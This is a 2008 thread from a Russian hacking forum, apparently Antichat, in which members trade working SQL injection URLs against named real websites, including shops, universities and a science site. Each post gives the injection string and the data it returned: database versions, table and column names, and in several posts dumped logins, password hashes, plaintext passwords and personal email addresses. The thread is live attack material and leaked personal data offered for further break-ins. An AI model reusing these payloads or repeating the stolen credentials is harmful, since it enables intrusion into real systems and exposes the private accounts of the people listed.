ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5021  
Старый 06.03.2008, 00:04
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию

Код:
http://www.m-logos.ru/seminars/info.phtml?id=-727+union+select+1,2,3,4,concat_ws(char(58),user(),version()%20%20,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
mlogos@zvm8.host.ru:4.0.27-log:mlogos
 
Ответить с цитированием

  #5022  
Старый 06.03.2008, 01:18
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Только учусь!!!
shop notebook.dn.ua

Код:
http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(database(),0x3a,version(),0x3a,user())/*
godnua_newmarket:4.1.20:godnua_mark@localhost

Код:
http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(fio,0x3a,mail)/**/from/**/users/*
-------------------------------------------------
там еще есть таблицы, но нужно подбирать

Последний раз редактировалось samarin; 06.03.2008 в 01:21..
 
Ответить с цитированием

  #5023  
Старый 06.03.2008, 03:40
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

arm.st.uz
_http://arm.st.uz/index.php?m=news&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
4.1.19-log:arm@localhost:arm
admin:70222949cc0db89ab32c9969754d4758 pass:1290
sk:70222949cc0db89ab32c9969754d4758 pass:1290
arm:5bbc7cc2da7217ccaf66f733b3fef728 pass:11183 kara-su2apm@mail.ru pass:11183

в админку не пускает, стоит привязка к ипу
 
Ответить с цитированием

  #5024  
Старый 06.03.2008, 08:41
Lamersha
Новичок
Регистрация: 11.12.2007
Сообщений: 6
Провел на форуме:
162349

Репутация: 14
По умолчанию

http://9955599.ru/jobsect.php?section=-5+union+select+null,version()/*
telgaz_mysql@212.193.227.34/4.1.22/telgaz_db
если ктонить раскоыряет напишите плиз чтото у меня не получилось дальше((
 
Ответить с цитированием

  #5025  
Старый 06.03.2008, 11:02
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

Lamersha, по-моему, там нет ничего интересного
Код:
resume
  id
  name
  pay
  mark
  date
  city
  section
  age
vacancy
  id
city
section
Хотя хз, мне лень дальше ковырять =)
 
Ответить с цитированием

  #5026  
Старый 06.03.2008, 16:30
sD0S
Новичок
Регистрация: 26.02.2008
Сообщений: 3
Провел на форуме:
22786

Репутация: 9
По умолчанию

PRIAMOS is a powerful SQL Injector & Scanner

www.priamos-project.com/whatis.htm
 
Ответить с цитированием

  #5027  
Старый 06.03.2008, 19:37
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.dixis.kz/index.php?shownews=true&nid=all&cat=-1+union+select+1,2,concat(version(),char(58),user( ),char(58),database()),4,5,6,7,8,9,10+/*

4.1.22-standard-log
dixis_user@localhost
dixis_shop
 
Ответить с цитированием

  #5028  
Старый 06.03.2008, 20:48
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

upc.edu
http://www.upc.edu/tercercicle/estudis/index_ambit.php?id_ambit=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database())/*
4.0.24_Debian-10sarge1-log:intranet@localhost:tercercicle intranet@localhost

Ну могу докрутить эти скули, вроде выводиться, а инфу показываеть не хочет
library.uiuc.edu
http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+123--

spo.princeton.edu
http://spo.princeton.edu/index.php?id=-1'+or+1=1/*

ethology.ru
Цитата:
http://ethology.ru/humor/?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database())/*
5.0.45-log:u12802@10.10.10.213:u12802
Цитата:
ethology_authors
id
lastname
firstname
middlename
fmname
biogr
ethology_encycl
ethology_english
ethology_forum
ethology_forum_theme
ethology_gbook
ethology_gbook_theme
ethology_humor
ethology_interview
ethology_lection
ethology_library
ethology_links_sites
ethology_news
ethology_other
ethology_phorum_theme
ethology_sitenews
ethology_theme
ethology_users
id
name
email
login
passwd
status
id_person
alex pass:11 info@ethology.ru
pass:183
mike:183otapovs@sibmail.ru
prox:124:tv_bio@mail.ru
gilburd:1324gil@bk.ru
voronova:23454:voronoff@list.ru
labas:5321:labas33@mail.ru
protopopov:5463rotopop@hotbox.ru
Danio:1098:sher@ukrcsm.kiev.ua
irina:4359:charina222004@yahoo.com
grebenshikov:36574:grevo@cv.ukrtel.net
gerbek:gerbek123:yuryh@rambler.ru

Последний раз редактировалось gibson; 06.03.2008 в 21:46..
 
Ответить с цитированием

  #5029  
Старый 06.03.2008, 22:49
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

2 gibson

Первая:

_http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+@@version--

Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

_http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema .tables--

SoyLinks
NewLinksSoy
NewLinksCorn

_http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema .tables+WHERE+TABLE_NAME+NOT+IN+('SoyLinks','NewLi nksSoy')--
и т.д. мне дальше лень
---------------------------
вторая:mysql

_http://spo.princeton.edu/index.php?id=1'+order+by+23/*

Скорее всего два Select столбца 23 ,а через Union ругается:

The used SELECT statements have a different number of columns

т.е. подзапросы

Последний раз редактировалось jokester; 06.03.2008 в 23:07.. Причина: дополнение
 
Ответить с цитированием

  #5030  
Старый 07.03.2008, 01:35
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

http://www.cyberbody.ru/shop.php?catid=1121000000000+UNION+SELECT+1,concat _ws(0x3a,username,user_password,user_email,user_ic q),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32+from+phpbb2_us ers/*
все качки на одной страничке)))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ